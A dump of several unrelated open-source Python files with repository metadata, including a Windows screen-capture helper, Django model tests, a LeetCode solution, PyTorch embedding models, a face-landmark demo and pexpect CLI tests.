| 37.447059 | 82 | 0.729815 | 888 | 6,366 | 5.027027 | 0.262387 | 0.013441 | 0.023522 | 0.024642 | 0.401658 | 0.343638 | 0.335125 | 0.292563 | 0.276434 | 0.276434 | 0 | 0.006646 | 0.172793 | 6,366 | 169 | 83 | 37.668639 | 0.841056 | 0.294533 | 0 | 0.377358 | 0 | 0 | 0.110511 | 0.044114 | 0 | 0 | 0 | 0 | 0.150943 | 1 | 0.04717 | false | 0.028302 | 0.09434 | 0 | 0.179245 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6529fab5ce361cffaf4209bfa5e651702c309ffe | 2,661 | py | Python | simplerpa/core/action/ActionScreen.py | songofhawk/simplerpa | 69491f3e9a84c106921be972242d05c5e3db5849 | [
"MIT"
] | 1 | 2022-02-16T08:37:25.000Z | 2022-02-16T08:37:25.000Z | simplerpa/core/action/ActionScreen.py | songofhawk/simplerpa | 69491f3e9a84c106921be972242d05c5e3db5849 | [
"MIT"
] | null | null | null | simplerpa/core/action/ActionScreen.py | songofhawk/simplerpa | 69491f3e9a84c106921be972242d05c5e3db5849 | [
"MIT"
] | null | null | null | import win32api
import pyautogui as autogui
from simplerpa.core.action.ActionImage import ActionImage
import win32clipboard as clip
import win32con
from io import BytesIO
class ActionScreen:
@staticmethod
def change_resolution(params: tuple):
"""
Change the screen resolution.
Args:
params (Tuple[int,int]): target resolution width and height
Returns:
None
"""
(width, height) = params
dm = win32api.EnumDisplaySettings(None, 0)
dm.PelsWidth = width
dm.PelsHeight = height
dm.BitsPerPel = 32
dm.DisplayFixedOutput = 1  # 0: default; 1: centered; 2: stretched
win32api.ChangeDisplaySettings(dm, 0)
@classmethod
def snapshot(cls, rect=None, to_clipboard=False):
"""
Take a screenshot of the given ScreenRect region.
Args:
rect: rectangle in standard screen coordinates (origin at the top-left corner); works for both autogui and Pillow
to_clipboard: whether to also copy the screenshot to the clipboard
Returns:
The screenshot of the given region as a PIL image.
"""
screen_shot = autogui.screenshot()
ret_image = screen_shot
if rect is not None:
ret_image = screen_shot.crop(
(int(float(rect.left)), int(float(rect.top)), int(float(rect.right)), int(float(rect.bottom))))
if to_clipboard:
output = BytesIO()
ret_image.convert('RGB').save(output, 'BMP')
data = output.getvalue()[14:]
output.close()
clip.OpenClipboard()
clip.EmptyClipboard()
clip.SetClipboardData(win32con.CF_DIB, data)
clip.CloseClipboard()
return ret_image
@classmethod
def snapshot_cv(cls, rect):
"""
Take a screenshot of the given ScreenRect region.
Args:
rect: rectangle in standard screen coordinates (origin at the top-left corner); works for both autogui and OpenCV
Returns:
The screenshot of the given region as an OpenCV image.
"""
pil_image = cls.snapshot(rect)
return ActionImage.pil_to_cv(pil_image)
@classmethod
def snapshot_pil(cls, rect=None, to_clipboard=False):
return cls.snapshot(rect, to_clipboard)
@staticmethod
def pick_color(x, y):
"""
Get the color of the pixel at the given screen position.
Args:
x: x coordinate of the position
y: y coordinate of the position
Returns:
Tuple[int]: channel values in the 0~255 range (pyautogui.pixel returns an (R, G, B) tuple)
"""
return autogui.pixel(x, y)
@staticmethod
def pixel_matches_color(x, y, color_tuple, tolerance=0):
"""
Check whether the given color matches the pixel at the given screen position.
Args:
x: x coordinate of the position
y: y coordinate of the position
color_tuple (Tuple[int]): the color as an (R, G, B) tuple
tolerance: allowed per-channel difference
Returns:
bool: whether the colors match
"""
return autogui.pixelMatchesColor(x, y, color_tuple, tolerance)
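# Usage sketch (Windows-only, given the win32 dependencies; kept commented out):
# img = ActionScreen.snapshot_pil(to_clipboard=True) # full-screen shot, copied to clipboard
# color = ActionScreen.pick_color(100, 200) # pixel color at (100, 200)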
| 26.346535 | 111 | 0.573844 | 266 | 2,661 | 5.642857 | 0.443609 | 0.036642 | 0.031979 | 0.017322 | 0.154564 | 0.099933 | 0 | 0 | 0 | 0 | 0 | 0.018049 | 0.333709 | 2,661 | 100 | 112 | 26.61 | 0.828539 | 0.226982 | 0 | 0.130435 | 0 | 0 | 0.003446 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130435 | false | 0 | 0.130435 | 0.021739 | 0.391304 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
652a65a674583107574e471d2edeacd1d14aeef3 | 15,403 | py | Python | common/tests/test_models.py | uktrade/tamato | 4ba2ffb25eea2887e4e081c81da7634cd7b4f9ca | [
"MIT"
] | 14 | 2020-03-25T11:11:29.000Z | 2022-03-08T20:41:33.000Z | common/tests/test_models.py | uktrade/tamato | 4ba2ffb25eea2887e4e081c81da7634cd7b4f9ca | [
"MIT"
] | 352 | 2020-03-25T10:42:09.000Z | 2022-03-30T15:32:26.000Z | common/tests/test_models.py | uktrade/tamato | 4ba2ffb25eea2887e4e081c81da7634cd7b4f9ca | [
"MIT"
] | 3 | 2020-08-06T12:22:41.000Z | 2022-01-16T11:51:12.000Z | from typing import List
from unittest.mock import patch
import pytest
from pytest_django.asserts import assertQuerysetEqual # noqa
import common.exceptions
from common.exceptions import NoIdentifyingValuesGivenError
from common.models import TrackedModel
from common.models.transactions import Transaction
from common.tests import factories
from common.tests import models
from common.tests.models import TestModel1
from common.tests.models import TestModel2
from common.tests.models import TestModel3
from common.validators import UpdateType
from footnotes.models import FootnoteType
from regulations.models import Group
from regulations.models import Regulation
pytestmark = pytest.mark.django_db
def generate_model_history(factory, number=5, **kwargs) -> List:
objects = []
kwargs["update_type"] = kwargs.get("update_type", UpdateType.CREATE)
current = factory.create(**kwargs)
objects.append(current)
kwargs["update_type"] = UpdateType.UPDATE
kwargs["version_group"] = kwargs.get("version_group", current.version_group)
for _ in range(number - 1):
current = factory.create(**kwargs)
objects.append(current)
return objects
def model_with_history(factory, date_ranges, **kwargs):
class Models:
"""
A convenient system to store tracked models.
Creates a number of historic models for both test model types.
Creates an active model for each test model type.
Then creates a number of future models for each type as well.
"""
all_models = generate_model_history(
factory, valid_between=date_ranges.earlier, **kwargs
)
active_model = factory.create(
valid_between=date_ranges.current, update_type=UpdateType.UPDATE, **kwargs
)
all_models.append(active_model)
all_models.extend(
generate_model_history(
factory,
valid_between=date_ranges.future,
update_type=UpdateType.UPDATE,
**kwargs,
),
)
return Models
@pytest.fixture
def model1_with_history(date_ranges):
return model_with_history(
factories.TestModel1Factory,
date_ranges,
version_group=factories.VersionGroupFactory.create(),
sid=1,
)
@pytest.fixture
def model2_with_history(date_ranges):
return model_with_history(
factories.TestModel2Factory,
date_ranges,
version_group=factories.VersionGroupFactory.create(),
custom_sid=1,
)
@pytest.fixture
def sample_model() -> models.TestModel1:
return factories.TestModel1Factory.create()
def test_get_current(model1_with_history, model2_with_history):
"""Ensure only the most recent records are fetched."""
latest_models = TrackedModel.objects.latest_approved()
assert latest_models.count() == 2
assert set(latest_models.values_list("pk", flat=True)) == {
model1_with_history.all_models[-1].pk,
model2_with_history.all_models[-1].pk,
}
def test_since_transaction(model1_with_history):
transaction = model1_with_history.active_model.transaction
assert TrackedModel.objects.since_transaction(transaction.id).count() == 5
def test_as_at(date_ranges):
"""Ensure only records active at a specific date are fetched."""
pks = {
factories.TestModel1Factory.create(valid_between=date_ranges.later).pk,
factories.TestModel1Factory.create(valid_between=date_ranges.later).pk,
}
queryset = TestModel1.objects.as_at(date_ranges.later.lower)
assert set(queryset.values_list("pk", flat=True)) == pks
def test_active(model1_with_history):
"""Ensure only the currently active records are fetched."""
queryset = TestModel1.objects.active()
assert set(queryset.values_list("pk", flat=True)) == {
model1_with_history.active_model.pk,
}
def test_get_version_raises_error():
"""Ensure that trying to get a specific version raises an error if no
identifiers given."""
with pytest.raises(NoIdentifyingValuesGivenError):
TestModel1.objects.get_versions()
with pytest.raises(NoIdentifyingValuesGivenError):
TestModel2.objects.get_versions(sid=1)
def test_get_current_version(model1_with_history):
"""Ensure getting the current version works with a standard sid
identifier."""
model = model1_with_history.active_model
assert TestModel1.objects.get_current_version(sid=model.sid) == model
def test_get_current_version_custom_identifier(model2_with_history):
"""Ensure getting the current version works with a custom identifier."""
model = model2_with_history.active_model
assert TestModel2.objects.get_current_version(custom_sid=model.custom_sid) == model
def test_get_latest_version(model1_with_history):
"""Ensure getting the latest version works with a standard sid
identifier."""
model = model1_with_history.all_models[-1]
assert TestModel1.objects.get_latest_version(sid=model.sid) == model
def test_get_latest_version_custom_identifier(model2_with_history):
"""Ensure getting the latest version works with a custom identifier."""
model = model2_with_history.all_models[-1]
assert TestModel2.objects.get_latest_version(custom_sid=model.custom_sid) == model
def test_get_first_version(model1_with_history):
"""Ensure getting the first version works with a standard sid identifier."""
model = model1_with_history.all_models[0]
assert TestModel1.objects.get_first_version(sid=model.sid) == model
def test_get_first_version_custom_identifier(model2_with_history):
"""Ensure getting the first version works with a custom identifier."""
model = model2_with_history.all_models[0]
assert TestModel2.objects.get_first_version(custom_sid=model.custom_sid) == model
def test_trackedmodel_can_attach_record_codes(workbasket):
tx = workbasket.new_transaction()
with tx:
# Note: regulation.Regulation implicitly creates a regulation.Group as well!
factories.RegulationFactory.create()
factories.FootnoteTypeFactory.create()
tracked_models = (
TrackedModel.objects.annotate_record_codes()
.select_related()
.filter(transaction=tx)
)
expected_models = [
(tx.pk, Group, "150", "00"),
(tx.pk, Regulation, "285", "00"),
(tx.pk, FootnoteType, "100", "00"),
]
assertQuerysetEqual(
tracked_models,
expected_models,
transform=lambda o: (
o.transaction.pk,
o.__class__,
o.record_code,
o.subrecord_code,
),
ordered=False,
)
def test_get_latest_relation_with_latest_links(
model1_with_history,
django_assert_num_queries,
):
"""Assert that using `.with_latest_links` should allow a TrackedModel to
retrieve the current version of a relation without any extra queries."""
oldest_link = model1_with_history.all_models[0]
latest_link = model1_with_history.all_models[-1]
factories.TestModel3Factory.create(linked_model=oldest_link)
with django_assert_num_queries(1):
instance = TestModel3.objects.all().with_latest_links()[0]
fetched_oldest_link = instance.linked_model
fetched_latest_link = instance.linked_model_current
assert oldest_link.pk == fetched_oldest_link.pk
assert latest_link.pk == fetched_latest_link.pk
def test_get_latest_relation_without_latest_links(
model1_with_history,
django_assert_num_queries,
):
"""
Assert that without using `.with_latest_link` requires a Tracked Model to
use 4 queries to get the current version of a relation.
Finding the current version of an object requires 4 queries:
- Get the originating object as a starting point (e.g. start = TrackedModel.objects.get(pk=1))
- Get the related object (e.g. related = start.link)
- Get the related objects version group (e.g. group = related.version_group)
- Get the current version (e.g. current = group.current_version)
"""
oldest_link = model1_with_history.all_models[0]
latest_link = model1_with_history.all_models[-1]
factories.TestModel3Factory.create(linked_model=oldest_link)
with django_assert_num_queries(4):
instance = TestModel3.objects.all().select_related("linked_model")[0]
fetched_oldest_link = instance.linked_model
fetched_latest_link = instance.linked_model_current
assert oldest_link == fetched_oldest_link
assert latest_link == fetched_latest_link
def test_get_taric_template(sample_model):
assert sample_model.get_taric_template() == "test_template"
def test_current_version(sample_model):
assert sample_model.current_version == sample_model
version_group = sample_model.version_group
version_group.current_version = None
version_group.save()
with pytest.raises(models.TestModel1.DoesNotExist):
sample_model.current_version
def test_save(sample_model):
assert sample_model.current_version == sample_model
with pytest.raises(common.exceptions.IllegalSaveError):
sample_model.name = "fails"
sample_model.save()
sample_model.name = "succeeds"
sample_model.save(force_write=True)
def test_new_draft_uses_passed_transaction(sample_model):
transaction_count = Transaction.objects.count()
new_transaction = sample_model.transaction.workbasket.new_transaction()
new_model = sample_model.new_version(
sample_model.transaction.workbasket,
transaction=new_transaction,
)
assert new_model.transaction == new_transaction
assert Transaction.objects.count() == transaction_count + 1
def test_identifying_fields(sample_model):
assert sample_model.get_identifying_fields() == {"sid": sample_model.sid}
def test_identifying_fields_unique(model1_with_history):
assert model1_with_history.active_model.identifying_fields_unique()
def test_identifying_fields_to_string(sample_model):
assert sample_model.identifying_fields_to_string() == f"sid={sample_model.sid}"
def test_current_as_of(sample_model):
transaction = factories.UnapprovedTransactionFactory.create()
with transaction:
unapproved_version = factories.TestModel1Factory.create(
sid=sample_model.sid,
version_group=sample_model.version_group,
)
assert models.TestModel1.objects.latest_approved().get().pk == sample_model.pk
assert (
models.TestModel1.objects.approved_up_to_transaction(transaction).get().pk
== unapproved_version.pk
)
def test_get_descriptions(sample_model):
descriptions = {
factories.TestModelDescription1Factory.create(described_record=sample_model)
for _ in range(2)
}
assert set(sample_model.get_descriptions()) == descriptions
def test_get_descriptions_with_update(sample_model, valid_user):
description = factories.TestModelDescription1Factory.create(
described_record=sample_model,
)
workbasket = factories.WorkBasketFactory.create()
new_description = description.new_version(workbasket)
description_queryset = sample_model.get_descriptions()
assert description in description_queryset
assert new_description not in description_queryset
description_queryset = sample_model.get_descriptions(
transaction=new_description.transaction,
)
assert new_description in description_queryset
assert description not in description_queryset
workbasket.submit_for_approval()
with patch(
"exporter.tasks.upload_workbaskets.delay",
):
workbasket.approve(valid_user)
description_queryset = sample_model.get_descriptions()
assert new_description in description_queryset
assert description not in description_queryset
def test_get_descriptions_with_request(request, sample_model):
description = factories.TestModelDescription1Factory.create(
described_record=sample_model,
)
workbasket = factories.WorkBasketFactory.create()
new_description = description.new_version(workbasket)
with patch("workbaskets.models.WorkBasket.current", return_value=workbasket):
description_queryset = sample_model.get_descriptions(request=request)
assert new_description in description_queryset
def test_get_description_dates(description_factory, date_ranges):
"""Verify that description models know how to calculate their end dates,
which should be up until the next description model starts or inifnite if
there is no later one."""
early_description = description_factory.create(
validity_start=date_ranges.adjacent_earlier.lower,
)
unrelated_description = description_factory.create(
# Note this doesn't share a described_record with above.
validity_start=date_ranges.adjacent_earlier.upper,
)
described_record = early_description.get_described_object()
current_description = description_factory.create(
**{early_description.described_object_field.name: described_record},
validity_start=date_ranges.normal.lower,
)
future_description = description_factory.create(
**{early_description.described_object_field.name: described_record},
validity_start=date_ranges.adjacent_later.lower,
)
objects = (
type(early_description)
.objects.filter(
**{early_description.described_object_field.name: described_record},
)
.with_end_date()
)
earlier = objects.as_at(date_ranges.adjacent_earlier.upper).get()
assert earlier.validity_end == date_ranges.adjacent_earlier.upper
assert earlier == early_description
current = objects.as_at(date_ranges.normal.upper).get()
assert current.validity_end == date_ranges.normal.upper
assert current == current_description
future = objects.as_at(date_ranges.adjacent_later.upper).get()
assert future.validity_end is None
assert future == future_description
def test_trackedmodel_str(trackedmodel_factory):
"""Verify no __str__ methods of TrackedModel classes crash or return non-
strings."""
instance = trackedmodel_factory.create()
result = instance.__str__()
assert isinstance(result, str)
assert len(result.strip())
def test_copy(trackedmodel_factory, approved_transaction):
"""Verify that a copy of a TrackedModel is a new instance with different
primary key and version group."""
instance: TrackedModel = trackedmodel_factory.create()
copy = instance.copy(approved_transaction)
assert copy.pk != instance.pk
assert copy.version_group != instance.version_group
@pytest.mark.parametrize(
("starting_sid", "expected_next_sid"),
(
(0, 1),
(10, 11),
),
)
def test_copy_increments_sid_fields(starting_sid, expected_next_sid):
instance = factories.TestModel1Factory.create(sid=starting_sid)
copy = instance.copy(factories.ApprovedTransactionFactory())
assert copy.sid == expected_next_sid
def test_copy_also_copies_dependents():
desc = factories.TestModelDescription1Factory.create()
copy = desc.described_record.copy(factories.ApprovedTransactionFactory())
assert copy.descriptions.count() == 1
assert copy.descriptions.get() != desc
assert copy.descriptions.get().description == desc.description
| 32.70276 | 98 | 0.738752 | 1,836 | 15,403 | 5.916667 | 0.152505 | 0.040504 | 0.032864 | 0.018411 | 0.436159 | 0.35736 | 0.30719 | 0.262543 | 0.227561 | 0.185124 | 0 | 0.008701 | 0.179251 | 15,403 | 470 | 99 | 32.77234 | 0.850577 | 0.129325 | 0 | 0.188742 | 0 | 0 | 0.018759 | 0.007413 | 0 | 0 | 0 | 0 | 0.175497 | 1 | 0.115894 | false | 0.003311 | 0.056291 | 0.009934 | 0.198676 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
652a688fb915a3b4f9d44a6dfea403cd79cc951b | 530 | py | Python | submissions/brick-wall/solution.py | Wattyyy/LeetCode | 13a9be056d0a0c38c2f8c8222b11dc02cb25a935 | [
"MIT"
] | null | null | null | submissions/brick-wall/solution.py | Wattyyy/LeetCode | 13a9be056d0a0c38c2f8c8222b11dc02cb25a935 | [
"MIT"
] | 1 | 2022-03-04T20:24:32.000Z | 2022-03-04T20:31:58.000Z | submissions/brick-wall/solution.py | Wattyyy/LeetCode | 13a9be056d0a0c38c2f8c8222b11dc02cb25a935 | [
"MIT"
] | null | null | null | # https://leetcode.com/problems/brick-wall
from collections import Counter
from itertools import accumulate
from typing import List  # needed for the List[List[int]] annotation below
class Solution:
def leastBricks(self, wall: List[List[int]]) -> int:
cnt = Counter()
for row in wall:
cum_arr = list(accumulate(row))
for i, cum_sum in enumerate(cum_arr):
if i == len(cum_arr) - 1:
break
cnt[cum_sum] += 1
if len(cnt) == 0:
return len(wall)
return len(wall) - max(cnt.values())
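# Worked example (the classic LeetCode case): the best vertical line crosses the
# most common internal edge position, here shared by 4 of the 6 rows:
# Solution().leastBricks([[1,2,2,1],[3,1,2],[1,3,2],[2,4],[3,1,2],[1,3,1,1]]) # -> 2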
| 26.5 | 56 | 0.549057 | 67 | 530 | 4.268657 | 0.537313 | 0.062937 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008596 | 0.341509 | 530 | 19 | 57 | 27.894737 | 0.810888 | 0.075472 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
652be6236409ee2b94f2985fd016d216879f52da | 1,183 | py | Python | models/embedding_learner.py | saiakhil0034/SimilarityLearning | 0b649e8ab48c065b35b656e3cc63a9f98897d857 | [
"MIT"
] | 1 | 2021-06-07T07:12:53.000Z | 2021-06-07T07:12:53.000Z | models/embedding_learner.py | saiakhil0034/SimilarityLearning | 0b649e8ab48c065b35b656e3cc63a9f98897d857 | [
"MIT"
] | null | null | null | models/embedding_learner.py | saiakhil0034/SimilarityLearning | 0b649e8ab48c065b35b656e3cc63a9f98897d857 | [
"MIT"
] | null | null | null | import torch.nn as nn
import torch  # needed for torch.no_grad() in get_embedding below
import torch.nn.functional as F
class EmbeddingNet(nn.Module):
def __init__(self, ni=128, no=64):
super(EmbeddingNet, self).__init__()
self.convnet = nn.Sequential(nn.Conv3d(ni, 128, 2, padding=2), nn.PReLU(),
nn.MaxPool3d(2, stride=1),
nn.Conv3d(128, 64, 2), nn.PReLU(),
nn.MaxPool3d(2, stride=1),
nn.Conv3d(64, 32, 2), nn.PReLU(),
nn.MaxPool3d(2, stride=1),
)
self.fc = nn.Sequential(nn.Linear(32 * 4 * 4 * 4, 256),
nn.PReLU(),
nn.Linear(256, 128),
nn.PReLU(),
nn.Linear(128, no)
)
def forward(self, x):
output = self.convnet(x)
output = output.view(output.size()[0], -1)
output = self.fc(output)
return output
def get_embedding(self, x):
with torch.no_grad():
return self.forward(x)
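# Shape sanity check (sketch): with the layer arithmetic above, a 6x6x6 input volume
# reaches the fc head as exactly 32*4*4*4 features:
# net = EmbeddingNet(ni=128, no=64)
# net(torch.randn(2, 128, 6, 6, 6)).shape # -> torch.Size([2, 64])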
| 36.96875 | 82 | 0.415892 | 125 | 1,183 | 3.856 | 0.336 | 0.072614 | 0.093361 | 0.062241 | 0.201245 | 0.201245 | 0.201245 | 0.201245 | 0.145228 | 0.145228 | 0 | 0.082409 | 0.46661 | 1,183 | 31 | 83 | 38.16129 | 0.681458 | 0 | 0 | 0.192308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115385 | false | 0 | 0.076923 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
652cc0cbc9523326d712b0adc3a64238b88584e2 | 1,339 | py | Python | examples/video_face_detect.py | ashuk203/face-alignment | 1f6452ae05ede0db9bbc48331d67d8b239fa9994 | [
"BSD-3-Clause"
] | 1 | 2020-12-09T13:08:49.000Z | 2020-12-09T13:08:49.000Z | examples/video_face_detect.py | ashuk203/face-alignment | 1f6452ae05ede0db9bbc48331d67d8b239fa9994 | [
"BSD-3-Clause"
] | null | null | null | examples/video_face_detect.py | ashuk203/face-alignment | 1f6452ae05ede0db9bbc48331d67d8b239fa9994 | [
"BSD-3-Clause"
] | null | null | null | import sys
sys.path.append('..')
import face_alignment
import cv2
import numpy as np
import torch
import time
import matplotlib.pyplot as plt
# Reading in frames of video
cap = cv2.VideoCapture('../test/assets/head-pose-face-detection-female.mp4')
frames = []
while True:
success, frame = cap.read()
if not success:
break
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frames.append(frame)
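# Not in the original flow, but releasing the capture handle once the read loop
# above has finished is good practice:
cap.release()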
# Initializing landmarking model
fa = face_alignment.FaceAlignment(face_alignment.LandmarksType._2D, device='cpu', face_detector='blazeface')
# Finding landmarks for a single frame
preds = fa.get_landmarks_from_image(frames[0])
plt.imshow(frames[0])
for detection in preds:
try:
plt.scatter(detection[:,0], detection[:,1], 2)
except Exception:  # keep the demo running if a detection has an unexpected type
print(type(detection))
# Finding landmarks in a batch of frames
batch = np.stack(frames)
batch = batch.transpose(0, 3, 1, 2)
batch = torch.Tensor(batch[:2])
t_start = time.time()
preds = fa.get_landmarks_from_batch(batch)
print(f'BlazeFace: Execution time for a batch of 2 images: {time.time() - t_start}')
fig = plt.figure(figsize=(10, 25))
for i, pred in enumerate(preds):
plt.subplot(5, 2, i + 1)
plt.imshow(frames[i])
plt.title(f'frame[{i}]')
for detection in pred:
plt.scatter(detection[:,0], detection[:,1], 2)
plt.show()
| 23.086207 | 108 | 0.697535 | 199 | 1,339 | 4.623116 | 0.457286 | 0.042391 | 0.021739 | 0.041304 | 0.117391 | 0.067391 | 0.067391 | 0 | 0 | 0 | 0 | 0.025135 | 0.168036 | 1,339 | 57 | 109 | 23.491228 | 0.800718 | 0.099328 | 0 | 0.052632 | 0 | 0 | 0.123231 | 0.041632 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.184211 | 0 | 0.184211 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
652f564253631dba4dc78d4b0682c98970fe8f42 | 2,666 | py | Python | src/figcli/test/cli/dev/put.py | figtools/figgy-cli | 88f4ccb8221ef9734f95b2637acfacc6e00983e7 | [
"Apache-2.0"
] | 36 | 2020-07-21T21:22:02.000Z | 2021-10-20T06:55:47.000Z | src/figcli/test/cli/dev/put.py | figtools/figgy-cli | 88f4ccb8221ef9734f95b2637acfacc6e00983e7 | [
"Apache-2.0"
] | 2 | 2020-10-29T12:49:15.000Z | 2021-04-29T01:12:05.000Z | src/figcli/test/cli/dev/put.py | figtools/figgy-cli | 88f4ccb8221ef9734f95b2637acfacc6e00983e7 | [
"Apache-2.0"
] | null | null | null | import pexpect
from figcli.test.cli.actions.delete import DeleteAction
from figcli.test.cli.config import *
from figcli.test.cli.figgy import FiggyTest
from figcli.utils.utils import *
class DevPut(FiggyTest):
def __init__(self, extra_args=""):
print(f"Testing `figgy config {put.name} --env {DEFAULT_ENV}`")
super().__init__(pexpect.spawn(f'{CLI_NAME} config {put.name} '
f'--env {DEFAULT_ENV} --skip-upgrade {extra_args}', timeout=45, encoding='utf-8'),
extra_args=extra_args)
def run(self):
self.step(f"Testing PUT for {param_1}")
self.add(param_1, param_1_val, param_1_desc)
delete = DeleteAction(extra_args=self.extra_args)
delete.delete(param_1, check_delete=True)
def add(self, key, value, desc, delete_first=True, add_more=False):
if delete_first:
delete = DeleteAction(extra_args=self.extra_args)
delete.delete(key)
self.expect('.*Please input a PS Name.*')
self.sendline(key)
self.expect('.*Please input a value.*')
self.sendline(value)
self.expect('.*Please input an optional.*')
self.sendline(desc)
self.expect('.*secret?.*')
self.sendline('n')
self.expect('.*another.*')
if add_more:
self.sendline('y')
else:
self.sendline('n')
def add_encrypt_app(self, key, value, desc, add_more=False):
delete = DeleteAction(extra_args=self.extra_args)
delete.delete(key)
self.expect('.*Please input a PS Name.*')
self.sendline(key)
self.expect('.*Please input a value.*')
self.sendline(value)
self.expect('.*Please input an optional.*')
self.sendline(desc)
self.expect('.*secret?.*')
self.sendline('y')
index = self.expect(['.*key.*', '.*another.*'])
if index == 0:
self.sendline('app')
self.expect('.*another.*')
if add_more:
self.sendline('y')
else:
self.sendline('n')
def add_another(self, key, value, desc, add_more=True):
print(f"Adding another: {key} -> {value}")
self.expect('.*PS Name.*')
self.sendline(key)
self.expect('.*Please input a value.*')
self.sendline(value)
self.expect('.*Please input an optional.*')
self.sendline(desc)
self.expect('.*secret?.*')
self.sendline('n')
self.expect('.*Add another.*')
if add_more:
self.sendline('y')
else:
self.sendline('n')
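# Usage sketch (assumes param_1 and friends come from the star-imported test config):
# DevPut().run()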
| 33.746835 | 121 | 0.571268 | 322 | 2,666 | 4.60559 | 0.220497 | 0.153742 | 0.086312 | 0.113284 | 0.57586 | 0.57586 | 0.544842 | 0.544842 | 0.544842 | 0.509777 | 0 | 0.004695 | 0.280945 | 2,666 | 78 | 122 | 34.179487 | 0.76891 | 0 | 0 | 0.617647 | 0 | 0 | 0.191298 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073529 | false | 0 | 0.088235 | 0 | 0.176471 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
652fa4f6c3ff3934bf17b164b8e1f7ca3db6f25c | 2,111 | py | Python | tklearn/embedding/bert.py | aethersoft/textkit-learn | 8b25b19d394fb361dde4427ed3b84d63552b7cc8 | [
"MIT"
] | 4 | 2018-10-23T01:49:55.000Z | 2022-02-21T18:35:09.000Z | tklearn/embedding/bert.py | ysenarath/textkit-learn | 06f7b68acd24332485296bc94d9be4cd06ca1f0d | [
"MIT"
] | null | null | null | tklearn/embedding/bert.py | ysenarath/textkit-learn | 06f7b68acd24332485296bc94d9be4cd06ca1f0d | [
"MIT"
] | null | null | null | import torch
from transformers import BertTokenizer, BertModel
from sklearn.base import BaseEstimator, TransformerMixin
__all__ = [
'BertEmbedding'
]
class BertEmbedding(BaseEstimator, TransformerMixin):
"""Bert is contextual word embedding. This is different from normal word embeddings that it requires entire
sentence to return embedding for a given word based on the context of that word."""
def __init__(self, use_mask_token=False):
"""Constructs Bert model."""
self.tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
self.model = BertModel.from_pretrained('bert-base-uncased', return_dict=True)
self.use_mask_token = use_mask_token
def fit(self, X, y=None):
"""Does nothing and return self.
Parameters
----------
X
Input features
y
Labels
Returns
-------
returns self.
"""
return self
def transform(self, X):
"""Transforms input to word embedding matrix.
Parameters
----------
X
Input features
Returns
-------
Returns embedding tensor.
"""
return self.get_embedding(X)
def get_embedding(self, x, index=None):
"""Extracts and returns sentence embedding for input sentence.
Parameters
----------
x
Iterable of tokenized sentences.
index
Index of the word to extract the word embedding. Index starts with one.
Returns
-------
Array of features for each sentence.
"""
tokens = self.tokenizer(x, return_tensors="pt", is_pretokenized=True, add_special_tokens=True, padding=True,
truncation=True, max_length=512)
output = self.model(**tokens).last_hidden_state.cpu().detach().numpy()
if self.use_mask_token:
index = torch.where(tokens["input_ids"] == self.tokenizer.mask_token_id)[1]  # compare token ids, not the whole BatchEncoding
if index is not None:
return output[:, index, :]
return output
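# Smoke-test sketch (downloads bert-base-uncased on first use; kept commented out):
# embedder = BertEmbedding()
# vectors = embedder.transform([["hello", "world"], ["deep", "learning"]])
# vectors.shape # -> (batch, sequence_length, hidden_size)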
